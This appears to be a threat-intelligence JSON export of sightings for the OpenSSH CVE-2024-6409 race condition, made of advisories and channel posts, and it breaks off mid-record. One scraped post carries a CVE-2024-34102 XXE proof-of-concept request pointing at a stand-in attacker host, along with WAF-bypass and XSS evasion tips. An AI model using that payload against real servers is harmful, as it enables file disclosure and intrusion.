{"vulnerability": "cve-2024-6409", "sightings": [{"uuid": "b3cac9a3-86d5-427f-9585-260f5ed6d8df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lkbyl7bddz2z", "content": "", "creation_timestamp": "2025-03-13T21:02:10.212117Z"}, {"uuid": "6a544799-a6ec-4094-8fcb-eb24077304de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1321", "content": "", "creation_timestamp": "2024-07-02T04:00:00.000000Z"}, {"uuid": "aebf8e6a-70d9-44be-946f-b3de5adea1d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7946", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aBulk Scanning Tool for OpenSSH CVE-2024-6387, CVE-2024-6409, CVE-2006-5051, CVE-2008-4109, and 16 other CVEs.\nURL\uff1ahttps://github.com/bigb0x/SSH-Scanner\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-11T12:00:31.000000Z"}, {"uuid": "a9fe0c91-de66-45e7-8eb0-c85bf9839626", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17351", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-6409\n\ud83d\udd25 CVSS Score: 7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: A race condition vulnerability was discovered in how signals are handled by OpenSSH's server (sshd). If a remote attacker does not authenticate within a set time period, then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). As a consequence of a successful attack, in the worst case scenario, an attacker may be able to perform a remote code execution (RCE) as an unprivileged user running the sshd server.\n\ud83d\udccf Published: 2024-07-08T17:57:10.517Z\n\ud83d\udccf Modified: 2025-05-22T19:17:16.728Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4457\n2. https://access.redhat.com/errata/RHSA-2024:4613\n3. https://access.redhat.com/errata/RHSA-2024:4716\n4. https://access.redhat.com/errata/RHSA-2024:4910\n5. https://access.redhat.com/errata/RHSA-2024:4955\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5444\n8. https://access.redhat.com/security/cve/CVE-2024-6409\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2295085", "creation_timestamp": "2025-05-22T19:46:06.000000Z"}, {"uuid": "6423edef-07cf-4ca6-8817-7140c58d268e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/IRANGOBLIN_ir/305", "content": "\ud83c\udd95\ud83c\udd95\ud83c\udd95\ud83c\udd95\n\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0435\u0449\u0435 \u043e\u0434\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c OpenSSH, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 regreSSHion\n\n\ud83d\udcdd\u0412\u043e \u0432\u0440\u0435\u043c\u044f \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2024-6387 (regreSSHion) \u0432 OpenSSH \u0431\u044b\u043b\u0430 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u0435\u0449\u0435 \u043e\u0434\u043d\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430.\n\n\ud83d\udcdd\u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442 Openwall \u0410\u043b\u0435\u043a\u0441\u0430\u043d\u0434\u0440 \u041f\u0435\u0441\u043b\u044f\u043a \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b \u043d\u043e\u0432\u044b\u0439 \u0431\u0430\u0433, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0439 \u0441 regreSSHion. \u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0433\u043e\u043d\u043a\u0438 \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432 \u0441 \u0443\u0447\u0430\u0441\u0442\u0438\u0435\u043c \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u0433\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 privsep \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 CVE-2024-6409 (7 \u0431\u0430\u043b\u043b\u043e\u0432 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSS).\n\n\ud83d\udcdd\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u0432 Linux \u0443\u0436\u0435 \u043d\u0430\u0447\u0430\u043b\u0438 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f CVE-2024-6409. Canonical \u0437\u0430\u044f\u0432\u0438\u043b\u0430, \u0447\u0442\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c Ubuntu \u043d\u0435 \u0441\u0442\u043e\u0438\u0442 \u0432\u043e\u043b\u043d\u043e\u0432\u0430\u0442\u044c\u0441\u044f, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043d\u0438 \u043e\u0434\u043d\u0430 \u0438\u0437 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442\u044b\u0435 \u0440\u0435\u043b\u0438\u0437\u044b.\n\n\n\n\ud83c\uddf7\ud83c\uddfa \u0427\u0438\u0442\u0430\u0442\u044c \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e\n\ud83c\uddfa\ud83c\uddf8 Read Full\n\n\ud83c\udf10 \u041e\u0431\u043c\u0435\u043d\u043d\u0438\u043a \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u044b: \n\n\ud83d\udcac \u2014 \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0438\u0439 \u0447\u0430\u0442\n\ud83d\udcbb \u0412\u0441\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0441\u043e\u0437\u0434\u0430\u0435\u0442\u0441\u044f \u0438 \u0444\u0438\u043b\u044c\u0442\u0440\u0443\u0435\u0442\u0441\u044f AI:", "creation_timestamp": "2024-07-20T08:43:05.000000Z"}, {"uuid": "f6f956c9-df85-44a2-b44a-16db138981b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "published-proof-of-concept", "source": "https://t.me/ptescalator/240", "content": "\u0427\u0442\u043e \u043f\u0440\u043e\u0438\u0437\u043e\u0448\u043b\u043e \u0441 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e OpenSSH \u0432 2024 \u0433\u043e\u0434\u0443 \ud83d\udeaa\n\n\u0412\u0437\u0433\u043b\u044f\u043d\u0435\u043c \u043d\u0430 \u0442\u0430\u0439\u043c\u043b\u0430\u0439\u043d:\n\n\u2022 \u0412\u0435\u0441\u043d\u0430. \u0411\u044d\u043a\u0434\u043e\u0440 \u0432 xz-utils (CVE-2024-3094). \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0435\u0433\u043e \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u0431\u044b\u043b\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0441 systemd, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432 OpenSSH \u0435\u0441\u0442\u044c \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u044c liblzma, \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0430\u044f \u0432 \u043d\u0435\u043c \u0438\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u0438 \u0441\u0430\u043c\u0438\u043c OpenSSH \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0430\u044f (\u0442\u043e \u0435\u0441\u0442\u044c \u0441\u043a\u043e\u0440\u0435\u0435 \u0440\u0435\u0447\u044c \u043e\u0431 \u0430\u0442\u0430\u043a\u0435 \u043d\u0430 \u0446\u0435\u043f\u043e\u0447\u043a\u0443 \u043f\u043e\u0441\u0442\u0430\u0432\u043e\u043a \u044d\u0442\u0438\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u0432, \u0430 \u043d\u0435 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e \u043d\u0430 OpenSSH).\n\n\u2022 \u0418\u044e\u043b\u044c. \u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043e\u043f\u0430\u0441\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u00ab\u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044f \u0433\u043e\u043d\u043a\u0438\u00bb \u0434\u043b\u044f \u0441\u0438\u0441\u0442\u0435\u043c \u043d\u0430 \u0431\u0430\u0437\u0435 glibc, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0430\u044f \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 regreSSHion (CVE-2024-6387) \u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0430\u044f \u0441\u043e\u0431\u043e\u0439 \u043f\u0435\u0440\u0435\u0440\u043e\u0436\u0434\u0435\u043d\u043d\u0443\u044e CVE-2006-5051.\n\n\u2022 \u0412\u0441\u0435 \u0442\u043e\u0442 \u0436\u0435 \u0438\u044e\u043b\u044c. \u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430 \u0441\u0445\u043e\u0436\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0430\u044f \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 CVE-2024-6409.\n\n\u2022 \u0410\u0432\u0433\u0443\u0441\u0442. \u0415\u0449\u0435 \u043e\u0434\u043d\u0430, \u0443\u0436\u0435 \u0441\u043f\u0435\u0446\u0438\u0444\u0438\u0447\u043d\u0430\u044f \u0434\u043b\u044f FreeBSD, CVE-2024-7589.\n\n\u2754 \u0427\u0442\u043e \u044d\u0442\u043e \u0432\u043e\u043e\u0431\u0449\u0435 \u0431\u044b\u043b\u043e\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u044e\u0442, \u0447\u0442\u043e \u0443\u0441\u043f\u0435\u0448\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u00ab\u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0439 \u0433\u043e\u043d\u043a\u0438\u00bb \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c RCE \u043d\u0430 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445. \u0411\u043e\u043b\u0435\u0435 \u0442\u043e\u0433\u043e, regreSSHion \u2014 \u0433\u043b\u0430\u0432\u043d\u044b\u0439 \u0431\u0430\u0433 (\u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 sshd) \u2014 \u0441\u0442\u0430\u0432\u0438\u0442 \u043f\u043e\u0434 \u0443\u0433\u0440\u043e\u0437\u0443 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u0430 SSH-\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0441 glibc. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043e\u0441\u043e\u0431\u043e\u0439 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 (\u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u0430 \u0438 \u0434\u043b\u044f \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e). \u041d\u043e \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e PoC \u043d\u0435\u0442 \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440.\n\n\u041c\u044b \u0440\u0435\u0448\u0438\u043b\u0438 \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u0442\u044c\u0441\u044f, \u0442\u0430\u043a \u043b\u0438 \u043e\u043f\u0430\u0441\u043d\u044b \u044d\u0442\u0438 \u00ab\u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044f \u0433\u043e\u043d\u043a\u0438\u00bb \u0438 \u043a\u0430\u043a\u0438\u0435 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u044b \u0432 sshd \u043f\u0440\u0438\u0437\u0432\u0430\u043d\u044b \u043d\u0435 \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438\u043b\u0438 \u0445\u043e\u0442\u044f \u0431\u044b \u0443\u043c\u0435\u043d\u044c\u0448\u0438\u0442\u044c \u0443\u0449\u0435\u0440\u0431 \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0438. \u041f\u043e\u043f\u0443\u0442\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u043b\u0438 \u043e\u0431\u0437\u043e\u0440 \u0438 \u043e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 OpenSSH \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0435\u0433\u043e \u0433\u043e\u0434\u0430.\n\n\ud83d\udd23 \u0418 \u0442\u0435\u043f\u0435\u0440\u044c \u0432\u0441\u0435 \u044d\u0442\u043e \u0441 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0431\u0430\u0437\u043e\u0439 \u0438 \u044d\u043a\u0441\u043a\u0443\u0440\u0441\u043e\u043c \u043d\u0430 30 \u0441\u0435\u043a\u0443\u043d\u0434 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e \u0432 \u043d\u0430\u0448\u0435\u043c \u0431\u043b\u043e\u0433\u0435 \u043d\u0430 \u0425\u0430\u0431\u0440\u0435. Enjoy!\n\n#CVE #escvr\n@ptescalator", "creation_timestamp": "2025-01-30T08:33:54.000000Z"}, {"uuid": "2ffdd8a6-7beb-4be3-8b32-99e34fb313f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "exploited", "source": "https://t.me/cyber_hsecurity/1608", "content": ":\n\u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641 \u0645\u0634\u0643\u0644\u0629 \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631 wanEditor v4.7.11 \u0648\u062a\u0645 \u0625\u0635\u0644\u0627\u062d\u0647\u0627 \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u064a\u0646 v.4.7.12 \u0648v.5\u060c \u0648\u0647\u064a \u062a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u0641\u064a \u0627\u0644\u0628\u0631\u0645\u062c\u0629 \u0627\u0644\u0646\u0635\u064a\u0629 \u0639\u0628\u0631 \u0627\u0644\u0645\u0648\u0627\u0642\u0639 (XSS) \u0639\u0628\u0631 \u0648\u0638\u064a\u0641\u0629 \u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u0635\u0648\u0631.\n\nhttps://gist.github.com/Mdxjj/5cf0a31e8abf24ed688ceb5b3543516d\n\n\u0647\u0646\u0627\u0643 \u0645\u0634\u0643\u0644\u0629 \u0641\u064a Debezium Community debezium-ui v.2.5 \u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0627\u0644\u0645\u062d\u0644\u064a \u0628\u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0639\u0634\u0648\u0627\u0626\u064a\u0629 \u0639\u0628\u0631 \u0648\u0638\u064a\u0641\u0629 \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0635\u0641\u062d\u0629.\n\nhttps://packetstormsecurity.com/files/178794/Debezium-UI-2.5-Credential-Disclosure.html\n\n\u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u0633\u0645\u062d IBM Security Verify Access Docker 10.0.0 \u062d\u062a\u0649 10.0.6 \u0644\u0644\u0645\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0645\u062d\u0644\u064a \u0628\u062a\u0635\u0639\u064a\u062f \u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a\u0647 \u0628\u0633\u0628\u0628 \u0627\u0644\u062a\u062d\u0642\u0642 \u063a\u064a\u0631 \u0627\u0644\u0635\u062d\u064a\u062d \u0645\u0646 \u0627\u0644\u0634\u0647\u0627\u062f\u0629. \u0645\u0639\u0631\u0641 IBM X-Force: 292416.\n\nhttps://exchange.xforce.ibmcloud.com/vulnerabilities/292416\n\n\u064a\u0632\u064a\u0644 javascript-deobfuscator \u062a\u0642\u0646\u064a\u0627\u062a \u062a\u0634\u0648\u064a\u0634 JavaScript \u0627\u0644\u0634\u0627\u0626\u0639\u0629. \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u0627\u062a \u0627\u0644\u0645\u062a\u0623\u062b\u0631\u0629\u060c \u064a\u0645\u0643\u0646 \u0623\u0646 \u062a\u0624\u062f\u064a \u0627\u0644\u062d\u0645\u0648\u0644\u0627\u062a \u0627\u0644\u0645\u0639\u062f\u0629 \u0648\u0627\u0644\u062a\u064a \u062a\u0633\u062a\u0647\u062f\u0641 \u062a\u0628\u0633\u064a\u0637 \u0627\u0644\u062a\u0639\u0628\u064a\u0631 \u0625\u0644\u0649 \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0629. \u0644\u0642\u062f \u062a\u0645 \u062a\u0635\u062d\u064a\u062d \u0647\u0630\u0647 \u0627\u0644\u0645\u0634\u0643\u0644\u0629 \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631 1.1.0. \u064a\u064f\u0646\u0635\u062d \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u0648\u0646 \u0628\u0627\u0644\u062a\u062d\u062f\u064a\u062b. \u064a\u062c\u0628 \u0639\u0644\u0649 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u064a\u0646 \u063a\u064a\u0631 \u0627\u0644\u0642\u0627\u062f\u0631\u064a\u0646 \u0639\u0644\u0649 \u0627\u0644\u062a\u0631\u0642\u064a\u0629 \u062a\u0639\u0637\u064a\u0644 \u0645\u064a\u0632\u0629 \u062a\u0628\u0633\u064a\u0637 \u0627\u0644\u062a\u0639\u0628\u064a\u0631.\n\nhttps://github.com/ben-sb/javascript-deobfuscator/commit/630d3caec83d5f31c5f7a07e6fadf613d06699d6\n\n\u062d\u0633\u064a\u0646 \u0631\u0648\u0632\u0643\u0627\u0631:\nCVE-2024-36684\nCRITICAL\nInformation\nCPEs\nPlugins\nDescription\nIn the module \"Custom links\" (pk_customlinks) &lt;= 2.3 from Promokit.eu for PrestaShop, a guest can perform SQL injection. The script ajax.php have a sensitive SQL call that can be executed with a trivial http call and exploited to forge a SQL injection.\nReferences\nhttps://security.friendsofpresta.org/modules/2024/06/18/pk_customlinks.html\n\nALSED404:\npayload\n\n\n\n\n\n#Payload\n===================================\n#ALSED404\n\nCVE-2024-34102\u00a0 POC \n\nPOST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2\n\n{\"address\":{\"totalsCollector\":{\"collectorList\":{\"totalCollector\":{\"sourceData\":{\"data\":\"http://attacker*com/xxe.xml\",\"dataIsURL\":true,\"options\":1337}}}}}}\n\n#CVE #POC\n\n===================================\n#ALSED404\n\nA Cloudflare WAF bypass combining simple (but efficient) tricks\n\n\n\nA payload with some obfuscation &amp; filter evasion tricks\n\n\n\n#CF #WAF #Bypass #Payload\n===================================\n#ALSED404\n\nXSS WAF Bypass by multi-char HTML entities\n\n&fjlig; translates to fj\n&nvgt; translates to &gt; + [?]\n&nvlt; translates to &lt; + [?]\n\n[?] - Unicode symbol\n\n#BugBounty #Tips\n===================================\n#ALSED404\n\nA Cloudflare WAF bypass combining simple (but efficient) tricks\n\n\n\nA payload with some obfuscation &amp; filter evasion tricks\n\n\n\n#CF #WAF #Bypass #Payload\n===================================\n#ALSED404\n\n\u0647\u0627 \u062c\u0645\u0627\u0639\u0629 \u0627\u0644\u0627\u064a\u0641\u0648\u0646 \ud83d\ude02\ud83d\ude02\ud83d\ude02\ud83d\ude02\n\ud83d\udd12 \u0645\u0637\u0648\u0631\u064a iOS \u0648macOS\u060c \u062a\u0646\u0628\u064a\u0647!\n\n\u0627\u0643\u062a\u0634\u0641 \u0643\u064a\u0641 \u064a\u0645\u0643\u0646 \u0623\u0646 \u062a\u0624\u062f\u064a 3 \u062b\u063a\u0631\u0627\u062a \u0623\u0645\u0646\u064a\u0629 \u062c\u062f\u064a\u062f\u0629 \u0641\u064a CocoaPods\u060c \u0625\u062d\u062f\u0649 \u0623\u062f\u0648\u0627\u062a \u0645\u0637\u0648\u0631\u064a Apple \u0627\u0644\u0634\u0647\u064a\u0631\u0629\u060c \u0625\u0644\u0649 \u0647\u062c\u0645\u0627\u062a \u0633\u0644\u0633\u0644\u0629 \u0627\u0644\u062a\u0648\u0631\u064a\u062f \u0639\u0644\u0649 \u062a\u0637\u0628\u064a\u0642\u0627\u062a iOS \u0648macOS.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644 \u0647\u0646\u0627: https://thehackernews.com/2024/07/critical-flaws-in-cocoapods-expose-ios.html\n#ALSED404\n\nPayload XSS: \n\n\n#Payload #XSS\n===================================\n#ALSED404\n\nDiscovered an XSS vulnerability but Imperva WAF blocked it?\nTry this XSS payload to bypass Imperva's protection.\n\n\n\n\n#BugBounty #Bypass_Imperva #Payload #XSS\n===================================\n#ALSED404\n\n\u062b\u063a\u0631\u0629 \u062c\u062f\u064a\u062f\u0629 \u0628\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 OpenSSH \u062a\u0646\u0637\u064a RCE \n\ud83d\udea8 New OpenSSH vulnerability (CVE-2024-6409) found in RHEL 9's versions 8.7p1 &amp; 8.8p1, allowing RCE via race condition in privsep child process. \n\nRead: https://thehackernews.com/2024/07/new-openssh-vulnerability-discovered.html \n\n\u26a0\ufe0f Active exploits detected! This bug is distinct from CVE-2024-6387 but shares similarities.\n#ALSED404", "creation_timestamp": "2024-12-13T19:00:21.000000Z"}, {"uuid": "0d6459cb-2684-485c-a600-a1464ce311c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/cvedetector/210", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-6409 - A signal handler race condition vulnerability was\", \n  \"Content\": \"CVE ID : CVE-2024-6409 \nPublished : July 8, 2024, 6:15 p.m. | 26\u00a0minutes ago \nDescription : A signal handler race condition vulnerability was found in OpenSSH's server (sshd), where a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). This issue leaves it vulnerable to a signal handler race condition on the cleanup_exit() function, which introduces the same vulnerability as CVE-2024-6387 in the unprivileged child of the SSHD server. \nSeverity: 7.0 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"08 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-08T20:46:06.000000Z"}, {"uuid": "fb8632a0-f8f6-440f-a2dd-36aa523f0545", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "Telegram/VqfWh7rHpMCbTwTmKsOFHeKJmX2q4zk1VlZFd9tptLMmZg", "content": "", "creation_timestamp": "2024-07-10T08:08:21.000000Z"}, {"uuid": "140c7176-de78-4d9b-8e87-d0ca005e9360", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/HackingInsights/5379", "content": "\u200aNew OpenSSH Vulnerability CVE-2024-6409 Exposes Systems to RCE Attack\n\nhttps://cybersecuritynews.com/new-openssh-vulnerability-cve-2024-6409/", "creation_timestamp": "2024-07-09T16:50:11.000000Z"}, {"uuid": "23a7dc75-94be-4152-aafc-37f4b18c1cb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", 